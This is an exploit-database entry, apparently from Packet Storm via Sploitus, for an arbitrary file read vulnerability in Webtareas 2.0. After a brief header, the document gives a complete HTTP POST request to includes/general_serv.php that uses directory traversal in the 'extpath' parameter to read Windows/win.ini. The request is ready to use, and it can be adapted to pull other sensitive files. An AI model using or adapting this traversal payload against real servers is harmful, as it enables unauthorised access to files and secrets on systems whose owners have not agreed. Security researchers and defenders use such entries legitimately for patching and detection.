Exploit for Webtateas 2.0 Arbitrary File Read

## https://sploitus.com/exploit?id=PACKETSTORM:157210
# Exploit Title: Webtateas 2.0 - Arbitrary File Read  
# Date: 2020-04-12  
# Exploit Author: China Banking and Insurance Information Technology Management Co.,Ltd.  
# Vendor Homepage: http://webtareas.sourceforge.net/general/home.php  
# Software Link: http://webtareas.sourceforge.net/general/home.php  
# Version: Webtateas v2.0  
# Tested on: Windows  
# CVE : N/A  
  
Vulnerable Request:  
POST /webtareas/includes/general_serv.php HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 72  
Origin: http://127.0.0.1  
Connection: close  
Referer: http://127.0.0.1/webtareas/general/home.php?  
Cookie: webTareasSID=k2vicb6pn9gsajncg3l6ltbver  
DNT: 1  
  
action=cardview-actions&prefix=..%2F&extpath=../../../../Windows/win.ini